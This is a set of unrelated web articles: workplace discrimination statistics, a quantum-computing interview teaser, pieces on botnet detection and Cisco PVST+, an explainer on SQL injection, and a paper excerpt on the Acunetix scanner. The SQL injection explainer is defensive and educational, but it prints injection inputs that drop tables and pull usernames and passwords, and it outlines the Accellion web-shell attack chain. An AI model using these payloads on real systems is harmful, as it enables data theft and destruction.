Despite equal opportunities and high-level degrees, ethnic minority women, and those with a specific religious dress code, are often subject to discrimination and harassment in the workplace. Furthermore, job discrimination statistics show they remain under-represented and disadvantaged and lose a chance to receive leadership positions.
14. The average settlement amount for EEOC claims on religious discrimination is around $40,000–$50,000.
(California Labor Law)
If some cases of discrimination get prolonged, it may cause an employee to file a lawsuit to seek justice. Seeking justice is an essential and worthy pursuit for people who have suffered a lot in the workplace. However, to improve their chances of winning a discrimination lawsuit, they have to have evidence and documentation to support their discrimination claim.
Weight and Disability Discrimination in the Workplace Statistics
Research shows that weight and disability discrimination have a very negative impact on the targeted employees’ lives. However, there are still many harassment and employment discrimination cases based on weight and disability. Let’s take a look at some statistics concerning the category mentioned above.
15. 93% of employers would rather hire a person who doesn’t appear overweight.
Weight discrimination in the workplace statistics shows that many employers wouldn’t hire an obese person or someone who appears to be overweight. Despite the negative effect weight discrimination can have on the lives of affected people, in some countries it is legal to discriminate against someone based on their weight.
16. Disabled employees earn about $9,000 less per year than non-disabled employees.
Over 60% of people with disabilities are of legal working age. However, they experience a much higher unemployment rate than non-disabled employees.
17. Disability discrimination accounts for 33.4 percent of filed employee discrimination cases.
EEOC employee lawsuit statistics show that it translates to 24,238 cases. The purpose of the Federal Law is to reduce discrimination against employees with disabilities. However, this is still a considerable problem and takes up a third of all workplace discrimination claims and complaints.
18. Nearly 26 US states see improvements in hiring people with disabilities.
Arizona has seen the most significant job gains in the past couple of years. In fact, more than 17,000 people with disabilities have joined the state’s economy. On the other hand, California saw the most significant losses, with up to 21,000 employees with disabilities losing their jobs.
Age Discrimination in the Workplace Statistics
Age discrimination is illegal and people are protected by Federal Law. All employees, regardless of their age, should have fair and equal wages and benefits. It is against the law to lay off more senior employees, replace them with younger ones, or pay them a smaller wage.
It is also illegal not to give an opportunity for promotion if a person is a few years before retirement. Let’s look at some statistics.
19. 31% of Hispanic employees younger than 40 have experienced discrimination in the workplace.
When it comes to Hispanic discrimination in the workplace — 70% of employees older than 40 experienced it. Furthermore, 83% of Hispanic workers who have experienced age discrimination say that it is widespread. Many of those who haven’t reported age discrimination say they are afraid they might lose their jobs if they do.
20. Age discrimination facts reveal that 36% of US residents feel that their age prevents them from finding a job.
According to EEOC, age remains one of the top discrimination drivers. People often hear they are either too young or too old for the job. Moreover, some didn’t receive a promotion because they were shortly before retirement.
21. Approximately 21% of employees have experienced discrimination in the workplace because of their age.
One in five workers complains they have experienced age discrimination in the workplace. At the same time, one-quarter of workers fear losing their jobs once they reach 40.
Wrapping Up the Workplace Discrimination Statistics
It is illegal for employers to treat someone poorly and unfairly because of their age, gender identity, disability, pregnancy, race, religion or belief, and sexual orientation. One survey showed that many people between 18 and 34 feel pretty uncomfortable around LGBTQ people. What’s frightening is that these are young people who should be less biased than older generations. Sadly, LGBT workplace discrimination statistics show that our society still has to work on accepting that all people are different.
Mistreated and harassed employees should not be afraid to step up and make a claim against discrimination.
Therefore, it is crucial for such incidents to be isolated and brought attention to before they happen to somebody else. If you feel you have been discriminated against or mistreated at work or even know anybody in a similar situation, make sure you file a complaint and help them stand up for themselves.
People Also Ask
What is an example of unfair discrimination?
Unfair discrimination is one of the most common forms of discrimination in the workplace. It happens when a person is being treated differently than other categories of people at the workplace. For example, when a woman doesn’t get offered a promotion at work because she got pregnant and will have a maternity leave soon, it is considered discrimination.
Unfair discrimination is usually associated with age, disability, sexual and religious orientation, status as a parent, national origin, race, color, and gender. Such unpleasant situations usually occur while people are at school, work, or in a public place (such as a shopping mall, subway station, and similar).
What are the most common discrimination offenses?
The most common discrimination offenses at the office may include job refusal, denial of new training opportunities, transfers, and promotions due to gender, age, parental status, or sexual orientation. In some situations, people get unfairly dismissed, have their shifts cut down, and are excluded or ignored by coworkers.
Workplace discrimination is also when the management hands employees impossible tasks. They can also hide information from certain employees so that they can’t deliver their best performance.
How do you prove discrimination at work?
When an unpleasant discrimination situation happens at work, simply reporting discrimination in the workplace to your manager is not enough. It is necessary to have evidence to prove it. First of all, the discriminated person must check if their problem is considered unfair discrimination.
Evidence can take several forms. For example, it includes testimony in the form of a statement taken from a witness who saw what happened. Materials, such as evaluations, handwritten notes by an employer, letters, emails, and memos can also be considered evidence.
How much is the average discrimination lawsuit
The average settlement amount for EEOC claims on employment discrimination is around $40,000–$50,000. Most of these cases get settled out of court, but some go to trial.
What constitutes disability discrimination?
Workplace discrimination due to disability means that somebody is being treated differently because of their disability, perceived disability, or association with a disabled person. Treating a person differently because of their disability, no matter if it is visible, can be against the law and therefore punishable.
Categories of discrimination based on physical or mental disabilities are: harassing an employee, avoiding recruiting or firing them because of their disability, not giving them a promotion, or prohibiting them from further improving themselves by doing extra training.
Is victimization a type of discrimination?
According to the Equality and Human Rights Commission, victimization is defined as an act of discrimination when a person gets badly treated because they have done a ‘protected act’. This includes making a complaint about discrimination and helping another person make it by providing evidence or information.
An example of victimization is when a boss shouts at an employee because they support another employee’s discrimination claim. According to workplace discrimination statistics, 22% of employees complain about workplace victimization each week. | <urn:uuid:10500557-9589-4d9d-b8cf-287747403976> | CC-MAIN-2022-40 | https://safeatlast.co/blog/workplace-discrimination-statistics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00087.warc.gz | en | 0.964053 | 3,466 | 3.0625 | 3 |
Quantum Computing: Sizing Up the Risks to SecurityHow Advanced Computing Could Threaten the Effectiveness of Encryption
Within the next five to 10 years, quantum computing will get so powerful that it could be used to break encryption on the fly, predicts Steve Marshall, CISO at U.K.-based Bytes Software Services.
"We rely on cryptography to prevent people from decoding our credit cards and to protect highly sensitive data that we share. Quantum computing is going to have a major influence on all of these things," Marshall says in an interview with Information Security Media Group.
"At the moment, quantum computers have about 72 qubits of quantum information. ... In order to crack things like RSA 2048 public key cryptography, you require about 400 qubits of power. So it's only a matter of time before quantum computers get to the point where they have got enough power in order to be able to crack RSA and other asymmetric cryptography."
In this interview (see audio link below image), Marshall also discusses:
- Categories of post-quantum cryptography;
- The state of research on quantum-resistant cryptography;
- How quantum computing impacts information security.
Marshall, who is based in the U.K., is CISO at Bytes Software Services, a computer support and services firm. He specializes in business consulting, payments, compliance, breach clean-up, enterprise architecture validation, assurance, corporate/information security, security restructures and risk across many business verticals and markets. | <urn:uuid:39b534aa-a09f-4ed6-95cc-3010bdd4a23c> | CC-MAIN-2022-40 | https://www.healthcareinfosecurity.com/interviews/quantum-computing-sizing-up-risks-to-security-i-4222 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00087.warc.gz | en | 0.903987 | 306 | 2.515625 | 3 |
beebright - stock.adobe.com
Malware authors have always been trying to update their software and evolve their techniques to take advantage of technologies and bypass security measures.
Botnets are a perfect example of how cyber criminals have managed to accomplish that over the past decade. Their widespread and severe consequences have transformed botnets into one of the most significant and destructive threats in the cyber security landscape, as they are responsible for many large-scale and high-profile attacks.
Examples of attacks performed by botnets include distributed denial of service (DDoS), personal or classified data theft, spam campaigns, cryptocurrency mining and fake news spreading on social media platforms.
Moreover, there is an exponential increase in attacks that result from crime-as-a-service offerings, which usually include botnets that are rented or sold to people or groups lacking experience or technical skills who wish to perform nefarious activities. So, it is clear that taking security measures against botnets is crucial for an organisation’s well-being and the protection of private data.
The growing threat of botnets
One way to categorise botnets is by the technology they adopt for their command and control (C&C) mechanism. In terms of C&C, the architecture of a botnet can be either centralised (see Figure 1) or decentralised (see Figure 2).
In the first category, the bots communicate with one or more servers using the client-server model. The generation of centralised botnets used internet relay chat (IRC) channels to communicate with the C&C server. However, due to the single-point-of-failure nature of centralised architectures, the criminals started developing botnets that were based on peer-to-peer (P2P) communications, overcoming the problem of the previous generation of botnets.
Indeed, P2P botnets, having the advantage of resilience and robustness, formed an even greater threat to organisations, but they also have two major drawbacks. To begin with, their maintenance is very difficult because of the complexity of their deployment and development and, secondly, since there is no longer a central C&C server, the herder might not have full control of the botnet any more.
The solution adopted by malware authors was to return to the centralised architecture model. However, they did not use the IRC protocol for the communications between the herder and the bots; the HTTP protocol was used instead. The advantage and strength of this solution is that the HTTP protocol is commonly used by legitimate, non-malicious web applications and services.
So, the attackers are able to embed their traffic in non-malicious, legitimate HTTP traffic and hide C&C commands among normal network activities. This gives HTTP-based botnets their great advantage, which is their ability to stay “under the radar” and perform their nefarious operations undetected.
Botnet detection techniques
Many researchers have dedicated their efforts to the study and analysis of HTTP botnets and finding accurate ways to detect them. A large number of researchers approach the problem by employing behaviour-based detection techniques, since the traditional signature-based systems are often easily bypassed by new generations of malware.
More specifically, the analysis of network traffic and its characteristics (not necessarily the packets’ payload) can provide very insightful information as to whether a network flow or packet is benign or if it is part of a botnet’s C&C mechanism, even in cases where traffic is encrypted. Examples of traffic characteristics that could prove useful are the flow duration, the total number of packets exchanged in a flow, the length of the packet in a flow and the median of payload bytes per packet.
Machine learning plays a key role in this approach, as behaviour-based botnet detection systems are usually built using a classification model that is trained on a dataset with specified features (a set of network characteristics in our case). This classification model is able to identify efficiently and accurately malware-generated traffic when certain behaviour patterns are met.
Apart from classification, more machine learning tools (feature extraction, for example) could be used to make our system as accurate and fast as possible. In general, novel attacks deployed by newer or more advanced versions of existing malware can be prevented using this approach, as this detection system is not based on malware signatures.
Cyber attackers adapt
Unsurprisingly, attackers started looking for ways and techniques that would allow them to overcome detection systems’ progress and bypass behaviour-based detection. Adversarial machine learning is an emerging technique that, among others, could target and evade security systems that utilise machine learning for dealing with malicious activities.
Typically, its functionality is based on taking advantage of classifier’s weaknesses. For example, there might be a space of instances (flows/packets, for example) that the classifier might not be able to describe well, so instances that belong to that space will be misclassified.
Another kind of attack that can be performed against systems based on machine learning is when adversaries attempt to attack the training phase of classification; that is, they try to inject adversarial training data to the classification model. This eventually leads to a model that labels malicious instances incorrectly as non-malicious, thus increasing the number of false negatives and leaving the system vulnerable.
Obfuscation techniques used by attackers should also be taken into consideration when implementing detection systems based on behaviour. More specifically, attackers might attempt to convert the value of certain attributes and characteristics of network traffic flows that are indicative of malicious activity, into values that are typical and normal for non-malicious flows, thereby evading security measures. Therefore, if the obfuscated features are used by the classification system, the malicious flows will have a greater chance of bypassing the detection system.
Keep an eye on trending threats
To conclude, a best practice for organisations in terms of security is to always be up-to-date with the current trends in the cyber threat landscape as it is a field that changes constantly and radically.
Machine learning has proven to be an extremely powerful ally in the battle against certain kinds of malware, and it currently seems to be the ideal method for keeping up with the evolution of threats, both in terms of detection accuracy and efficiency.
Of course, behaviour-based systems have the drawback of false positives, but the benefits of this approach are more than enough to ignore that disadvantage.
However, when employing behaviour-based systems, organisations should not overlook the complexity and difficulty of building such systems and the caveats that come with this solution, some of them mentioned above – adversarial machine learning, obfuscation of features.
Technical expertise, along with patience and the ability to gain insight, are probably the most important values professionals and organisations should be equipped with to successfully deploy and manage such complex systems that will help them adjust to today’s threat landscape and continue operating in a secure environment. | <urn:uuid:5d95d5a4-ec7d-4ae9-9549-bb293d0e15d6> | CC-MAIN-2022-40 | https://www.computerweekly.com/microscope/opinion/Botnets-and-machine-learning-A-story-of-hide-and-seek | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00087.warc.gz | en | 0.952904 | 1,404 | 3.515625 | 4 |
Per-VLAN Spanning Tree
One of the things that must be considered with VLANs is the function of the Spanning Tree Protocol (STP). STP is designed to prevent loops in a switch/bridged topology to eliminate the endless propagation of broadcast around the loop. With VLANs, there are multiple broadcast domains to be considered. Because each broadcast domain is like a unique bridged internetwork, you must consider how STP will operate.
The 802.1Q standard defines one unique Spanning Tree instance to be used by all VLANs in the network. STP runs on the Native VLAN so that it can communicate with both 802.1Q and non-802.1Q compatible switches. This single instance of STP is often referred to as 802.1Q Mono Spanning Tree or Common Spanning Tree (CST). A single spanning tree lacks flexibility in how the links are used in the network topology. Cisco implements a protocol known as Per-VLAN Spanning Tree Plus (PVST+) that is compatible with 802.1Q CST but allows a separate spanning tree to be constructed for each VLAN. There is only one active path for each spanning tree; however, in a Cisco network, the active path can be different for each VLAN.
The term Mono Spanning Tree is typically not used anymore because the IEEE 802.1s standard has now defined a Multiple Spanning Tree (MST) protocol that uses the same acronym.
Because a trunk link carries traffic for more than one broadcast domain and switches are typically connected together via trunk links, it is possible to define multiple Spanning Tree topologies for a given network. With PVST+, a root bridge and STP topology can be defined for each VLAN. This is accomplished by exchanging BPDUs for each VLAN operating on the switches. By configuring a different root or port cost based on VLANs, switches could utilize all the links to pass traffic without creating a bridge loop. Using PVST+, administrators can use ISL or 802.1Q to maintain redundant links and load balance traffic between parallel links using the Spanning Tree Protocol. Figure 3-15 shows an example of load balancing using PVST+.
Figure 3-15 PVST Load Balancing
Cisco developed PVST+ to allow running several STP instances, even over an 802.1Q network by using a tunneling mechanism. PVST+ utilizes Cisco devices to connect to a Mono Spanning Tree zone, typically another vendor's 802.1Q-based network, to a PVST+ zone, typically a Cisco ISL-based network. No specific configuration is needed to achieve this. PVST+ provides support for 802.1Q trunks and the mapping of multiple spanning trees to the single spanning tree of standard 802.1Q switches running Mono Spanning Tree.
The PVST+ architecture distinguishes three types of regions:
A PVST region (PVST switches using ISL only)
A PVST+ region (PVST+ using ISL and/or 802.1Q between Cisco switches)
A Mono Spanning Tree region (Common or Mono Spanning Tree using 802.1Q and exchanging BPDUs on the Native VLAN only between a Cisco and Non-Cisco switches using 802.1Q)
Each region consists of a homogenous type of switch. You can connect a PVST region to a PVST+ region using ISL ports. You can also connect a PVST+ region to a Mono Spanning Tree region using 802.1Q ports.
At the boundary between a PVST region and a PVST+ region, the mapping of Spanning Tree is one-to-one. At the boundary between a Mono Spanning Tree region and a PVST+ region, the Spanning Tree in the Mono Spanning Tree region maps to one PVST in the PVST+ region. The one it maps to is the CST. The CST is the PVST of the Native VLAN (VLAN 1 by default).
On a 802.1Q trunk, BPDUs can be sent or received only by the Native VLAN. Using PVST+, Cisco can send its PVST BPDUs as tagged frames using a Cisco multicast address as the destination. When a non-Cisco switch receives the multicast, it is flooded (but not interpreted as a BPDU, thus maintaining the integrity of CST). Because it is flooded, it will eventually reach Cisco switches on the other side of the CST domain. This allows the PVST fames to be tunneled through the MST region. Tunneling means that the BPDUs are flooded through the Mono Spanning Tree region along the single spanning tree present in the Mono Spanning Tree region.
PVST+ networks must be in a tree-like structure for proper STP operation. | <urn:uuid:d2b0db2c-ca33-4b54-96e9-8623248dcdb5> | CC-MAIN-2022-40 | https://www.ciscopress.com/articles/article.asp?p=102157&seqNum=4 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00087.warc.gz | en | 0.889318 | 1,006 | 2.8125 | 3 |
What is SQL injection
SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details.
The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
When calculating the potential cost of an SQLi, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen.
While this vector can be used to attack any SQL database, websites are the most frequent targets.
What are SQL queries
SQL is a standardized language used to access and manipulate databases to build customizable data views for each user. SQL queries are used to execute commands, such as data retrieval, updates, and record removal. Different SQL elements implement these tasks, e.g., queries using the SELECT statement to retrieve data, based on user-provided parameters.
A typical eStore’s SQL database query may look like the following:
SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = ItemNumber
From this, the web application builds a string query that is sent to the database as a single SQL statement:
sql_query= " SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = " & Request.QueryString("ItemID")
A user-provided input http://www.estore.com/items/items.asp?itemid=999 can then generates the following SQL query:
SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = 999
As you can gather from the syntax, this query provides the name and description for item number 999.
Types of SQL Injections
SQL injections typically fall under three categories: In-band SQLi (Classic), Inferential SQLi (Blind) and Out-of-band SQLi. You can classify SQL injections types based on the methods they use to access backend data and their damage potential.
The attacker uses the same channel of communication to launch their attacks and to gather their results. In-band SQLi’s simplicity and efficiency make it one of the most common types of SQLi attack. There are two sub-variations of this method:
- Error-based SQLi—the attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
- Union-based SQLi—this technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker.
Inferential (Blind) SQLi
The attacker sends data payloads to the server and observes the response and behavior of the server to learn more about its structure. This method is called blind SQLi because the data is not transferred from the website database to the attacker, thus the attacker cannot see information about the attack in-band.
Blind SQL injections rely on the response and behavioral patterns of the server so they are typically slower to execute but may be just as harmful. Blind SQL injections can be classified as follows:
- Boolean—that attacker sends a SQL query to the database prompting the application to return a result. The result will vary depending on whether the query is true or false. Based on the result, the information within the HTTP response will modify or stay unchanged. The attacker can then work out if the message generated a true or false result.
- Time-based—attacker sends a SQL query to the database, which makes the database wait (for a period in seconds) before it can react. The attacker can see from the time the database takes to respond, whether a query is true or false. Based on the result, an HTTP response will be generated instantly or after a waiting period. The attacker can thus work out if the message they used returned true or false, without relying on data from the database.
The attacker can only carry out this form of attack when certain features are enabled on the database server used by the web application. This form of attack is primarily used as an alternative to the in-band and inferential SQLi techniques.
Out-of-band SQLi is performed when the attacker can’t use the same channel to launch the attack and gather information, or when a server is too slow or unstable for these actions to be performed. These techniques count on the capacity of the server to create DNS or HTTP requests to transfer data to an attacker.
SQL injection example
An attacker wishing to execute SQL injection manipulates a standard SQL query to exploit non-validated input vulnerabilities in a database. There are many ways that this attack vector can be executed, several of which will be shown here to provide you with a general idea about how SQLI works.
For example, the above-mentioned input, which pulls information for a specific product, can be altered to read http://www.estore.com/items/items.asp?itemid=999 or 1=1.
As a result, the corresponding SQL query looks like this:
SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = 999 OR 1=1
And since the statement 1 = 1 is always true, the query returns all of the product names and descriptions in the database, even those that you may not be eligible to access.
Attackers are also able to take advantage of incorrectly filtered characters to alter SQL commands, including using a semicolon to separate two fields.
For example, this input http://www.estore.com/items/iteams.asp?itemid=999; DROP TABLE Users would generate the following SQL query:
SELECT ItemName, ItemDescription FROM Items WHERE ItemNumber = 999; DROP TABLE USERS
As a result, the entire user database could be deleted.
Another way SQL queries can be manipulated is with a UNION SELECT statement. This combines two unrelated SELECT queries to retrieve data from different database tables.
For example, the input http://www.estore.com/items/items.asp?itemid=999 UNION SELECT user-name, password FROM USERS produces the following SQL query:
SELECT ItemName, ItemDescription FROM Items WHERE ItemID = '999' UNION SELECT Username, Password FROM Users;
Using the UNION SELECT statement, this query combines the request for item 999’s name and description with another that pulls names and passwords for every user in the database.
SQL injection combined with OS Command Execution: The Accellion Attack
Accellion, maker of File Transfer Appliance (FTA), a network device widely deployed in organizations around the world, and used to move large, sensitive files. The product is over 20 years old and is now at end of life.
FTA was the subject of a unique, highly sophisticated attack combining SQL injection with operating system command execution. Experts speculate the Accellion attack was carried out by hackers with connections to the financial crimes group FIN11, and ransomware group Clop.
The attack demonstrates that SQL injection is not just an attack that affects web applications or web services, but can also be used to compromise back-end systems and exfiltrate data.
Who was affected by the attack?
The Accellion exploit is a supply chain attack, affecting numerous organizations that had deployed the FTA device. These included the Reserve Bank of New Zealand, the State of Washington, the Australian Securities and Investments Commission, telecommunication giant Singtel, and security software maker Qualys, as well as numerous others.
Accelion Attack flow
According to a report commissioned by Accellion, the combination SQLi and command execution attack worked as follows:
- Attackers performed SQL Injection to gain access to document_root.html, and retrieved encryption keys from the Accellion FTA database.
- Attackers used the keys to generate valid tokens, and used these tokens to gain access to additional files
- Attackers exploited an operating system command execution flaw in the sftp_account_edit.php file, allowing them to execute their own commands
- Attackers created a web shell in the server path /home/seos/courier/oauth.api
- Using this web shell, they uploaded a custom, full-featured web shell to disk, which included highly customized tooling for exfiltration of data from the Accellion system. The researchers named this shell DEWMODE.
- Using DEWMODE, the attackers extracted a list of available files from a MySQL database on the Accellion FTA system, and listed files and their metadata on an HTML page
- The attackers performed file download requests, which contained requests to the DEWMODE component, with encrypted and encoded URL parameters.
- DEWMODE is able to accept these requests and then delete the download requests from the FTA web logs.
This raises the profile of SQL injection attacks, showing how they can be used as a gateway for a much more damaging attack on critical corporate infrastructure.
SQLI prevention and mitigation
There are several effective ways to prevent SQLI attacks from taking place, as well as protecting against them, should they occur.
The first step is input validation (a.k.a. sanitization), which is the practice of writing code that can identify illegitimate user inputs.
While input validation should always be considered best practice, it is rarely a foolproof solution. The reality is that, in most cases, it is simply not feasible to map out all legal and illegal inputs—at least not without causing a large number of false positives, which interfere with user experience and an application’s functionality.
For this reason, a web application firewall (WAF) is commonly employed to filter out SQLI, as well as other online threats. To do so, a WAF typically relies on a large, and constantly updated, list of meticulously crafted signatures that allow it to surgically weed out malicious SQL queries. Usually, such a list holds signatures to address specific attack vectors and is regularly patched to introduce blocking rules for newly discovered vulnerabilities.
Modern web application firewalls are also often integrated with other security solutions. From these, a WAF can receive additional information that further augments its security capabilities.
For example, a web application firewall that encounters a suspicious, but not outright malicious input may cross-verify it with IP data before deciding to block the request. It only blocks the input if the IP itself has a bad reputational history.
Imperva cloud-based WAF uses signature recognition, IP reputation, and other security methodologies to identify and block SQL injections, with a minimal amount of false positives. The WAF’s capabilities are augmented by IncapRules—a custom security rule engine that enables granular customization of default security settings and the creation of additional case-specific security policies.
Our WAF also employs crowdsourcing techniques that ensure that new threats targeting any user are immediately propagated across the entire user-base. This enables rapid response to newly disclosed vulnerability and zero-day threats.
Adding Data-Centric Protection for Defense in Depth
The optimal defense is a layered approach that includes data-centric strategies that focus on protecting the data itself, as well as the network and applications around it. Imperva Database Security continuously discovers and classifies sensitive data to identify how much sensitive data there is, where it is stored, and whether it’s protected.
In addition, Imperva Database Security actively monitors data access activity to identify any data access behavior that is a risk or violates policy, regardless of whether it originates with a network SQL query, a compromised user account, or a malicious insider. Receive automatic notification of a security event so you can respond quickly with security analytics that provides a clear explanation of the threat and enables immediate initiation of the response process, all from a single platform.
Database security is a critical last line of defense to preventing hacks like SQLi. Imperva’s unique approach to protecting data encompasses a complete view of both the web application and data layer. | <urn:uuid:10f046a3-4570-4953-8506-13cef1fb4180> | CC-MAIN-2022-40 | https://www.imperva.com/learn/application-security/sql-injection-sqli/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00087.warc.gz | en | 0.893322 | 2,570 | 3.328125 | 3 |
Apple has developed a new digital content authoring tool, which allows developers with little programming background to build iOS applications.
The patent filed, entitled "Content Configuration for Device Platforms (opens in new tab)", details how users can create content without even accessing computer code, according to Apple Insider.
The patent application states that the computer programming languages are a "hindrance to content creation", confusing many talented content creators and designers.
To address the situation, Apple has come up with software that relies on a graphical user interface.
This tool is similar to the ones used for webpage development. Apple also plans to help iOS developers check their content, on multiple screens, with various resolutions. This includes even the wider displays of computers or TVs.
Currently, iOS apps can be made for iPhone, iPad or both.
"Due to such diverse devices having such diverse capabilities, content must now be created not only once, but often several times so that it can be configured for multiple device types", says the patent application.
"This development has introduced a new barrier to content creation and delivery," realises Apple. Now, in order to ease the life of developers the company suggests that the "lowest-common denominator approach" is the solution.
Source: Apple Insider (opens in new tab) | <urn:uuid:ed234d99-0a9f-473c-bcd5-5db8440372b6> | CC-MAIN-2022-40 | https://www.itproportal.com/2012/04/16/would-you-make-your-own-iphone-apps/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00087.warc.gz | en | 0.925278 | 264 | 2.5625 | 3 |
Written by Angel Rajan and Emre Erturk. (https://arxiv.org/ftp/arxiv/papers/1706/1706.08017.pdf)
Cloud security is one of the biggest concerns for many companies. The growth in the number and size of websites increases the need for better securing those websites. Manual testing and detection of web vulnerabilities can be very time consuming. Automated Web Vulnerability Scanners (WVS) help with the detection of vulnerabilities in web applications. Acunetix is one of the widely used vulnerability scanners. Acunetix is also easy to implement and to use. The scan results not only provide the details of the vulnerabilities, but also give information about fixing the vulnerabilities. AcuSensor and AcuMonitor (technologies used by Acunetix) help generate more accurate potential vulnerability results. One of the purposes of this paper is to orient current students of computer security with using vulnerability scanners. Secondly, this paper provides a literature review related to the topic of security vulnerability scanners. Finally, web vulnerabilities are addressed from the mobile device and browser perspectives.
With the advancements in cloud computing, web services, and browser based applications, most business rely on conducting their business communications and transactions online. However, these websites and web applications are not completely secure. Around 30,000 websites are being attacked every day (Lyne, 2013), and one out of every three websites is vulnerable to hacking (Schupak, 2015). Moreover, ninety percent of passwords are vulnerable to being stolen (Warman, 2013). The increasing number of websites and online applications increases the urgency of securing these websites.
Web security scanners are automated tools that check out websites or web applications for security vulnerabilities, without accessing the application’s source code (Saeed, 2014). Web vulnerability scanners help to find vulnerabilities of web applications and websites. A security vulnerability is a weakness that may be exploited to cause damage, but its presence does not cause harm by itself (Jeeva, Raveena, Sangeetha, & Vinothini, 2016). Grabber, Vega, Acunetix, Wapiti (InfoSec Institute, 2014) are few examples of web vulnerability scanners.
The Cloud Security Alliance (2016) has recently identified twelve major types of security concerns and threats. Many of these are relevant to areas where web vulnerability scanners may be helpful in reducing risks. For example, two of these concerns, insecure APIs and insufficient due diligence, may be overlooked by web developers and web masters.
This report focuses on Acunetix, one of the widely used web vulnerability scanner. It begins with a description of Acunetix with the details of Acunetix used for this case study. Then the report tries to explain the working of Acunetix with proper screenshots. In the next section, few high priority vulnerabilities identified by Acunetix are described. AcuSensor and AcuMonitor technologies implemented by Acunetix is also discussed. Advantages and disadvantages of Acunetix is discussed in the next section and finally this report finishes with some recommendations and conclusion.
Acunetix is an automated web vulnerability scanner which scans any web application or websites that use HTTP or HTTPS protocols and are accessible through a web browser. It audits the websites by identifying vulnerabilities, such as SQL injection, cross site scripting, and others.
The following table (Table 1) gives the description of the version, cost and other details of Acunetix used for this paper. Websites mainly used in the walkthrough are test websites as opposed to organisational websites. Acunetix is available in four versions, online, standard, pro and enterprise.
Table 1. Version and platform of Acunetix used
The address of a website or web application that needs to be scanned should be added to the target. A description of the website can also be given while adding the target. Figure 1 below, is the screenshot of adding a target with description
After adding the target, website is ready for scanning. As seen in Figure 2, options for setting the business criticality, scan speed and others are available. Websites and web applications can also be kept for continuous scanning.
As shown in Figure 3, Acunetix offers a feature which tries to auto login to the targeted website. To accommodate this feature, two options are available. The tester can either enter the username and password manually, or a use a pre-recorded login sequence for auto login.
If the targeted web application is using PHP or .NET, the scan results can be improved by downloading and installing the proper AcuSensor. Figure 4 below shows enabling of AcuSensor.
During scanning, Acunetix provides details such as scan progress, scan duration, number of requests sent, average response time, and information about the target. It also provides the latest detected vulnerabilities and their priorities. Based on the detected vulnerabilities, Acunetix gives the overall threat level of website or web application. Figure 5 shows a screenshot of Acunetix during a scan.
Once scanning is finished, the vulnerabilities detected by Acunetix are listed, based on the priority. It gives the name, URL, parameter, and status of the threat detected. Figure 6 shows the screenshot of scan result and Figure 7 shows the vulnerabilities identified during the scan.
Each vulnerability detected provides additional description, impact and useful tips to fix the vulnerability. It also provides the HTTP request sent, which can help in fixing and testing the particular vulnerability. Figure 8 below shows the description and impact of vulnerability “weak password”.
Scan reports can be generated based on the scan results. Reports are available in different templates, such as affected items, developer, executive summary, and also several compliance reports can be generated. All the reports generated will be available under the reports tab, and can be downloaded later. Figure 9 shows the options for generating reports.
Two scans for a single target can be compared and a comparison report is generated by Acunetix. This can be helpful to identify whether the fixes for the threats are working correctly and if those fixes do not induce more vulnerabilities. Figure 10 below shows selection of two scans on same target and “compare scans” button gets enabled.
Few high priority vulnerabilities detected by Acunetix include Cross Site Scripting (XSS), SQL injection, Blind SQL injection, and directory traversal.
XSS is inserting malicious code into a victim’s web application so that, when a victim browses the web application, the malicious script code is executed (Gupta & Gupta, 2015). A hacker injects malicious codes in the dynamic websites and when the code is executed in the web browser, it changes the web pages (Jasmine, Devi, & George, 2017). The goal of an XSS attack is to get access to the client cookies or any other sensitive information, which is used to authenticate the client to the website (Jasmine, Devi, & George, 2017).
When users visit a website, their browsers send HTTP requests, in which the headers include information about their browsers and operating systems. Based on this information, the users may be directed to the mobile version of website that, along with different content, may have different vulnerabilities. This has significant implications while trying to identify XSS issues. For this reason, Acunetix aims to crawl different versions of each website with different user agents.
SQL injection vulnerability can cause the exposure of all the sensitive data including username, password, and credit card details of a web application database (Khalid & Yousif, 2016). The SQL attacker tries to insert a part of malicious SQL commands by using special variables and inserting them in to the application. The web application in turn sends these malicious commands to the target database in the server that executes them in a different purpose using legitimate query (Abdulqader, Thiyab, Ali, & 2017). A blind SQL injection involves asking the database a series of true or false questions, in order to get closer to the vulnerable code itself. It is important to make a note here that identifying vulnerable code itself may not be sufficient for hackers on its own. Additionally, phishing is often used to obtain other user details (Erturk, 2012). These details can then be used as part of an SQL injection attack to extract unauthorized information from an online database.
Directory traversal (also known as path traversal) can be defined as an attack that “aims to access files and directories that are stored outside the web root folder” (OWASP, 2015). This vulnerability can exist in the web server or web application code. This allows the attacker to access parts of directories which are restricted, and to execute commands on the web server.
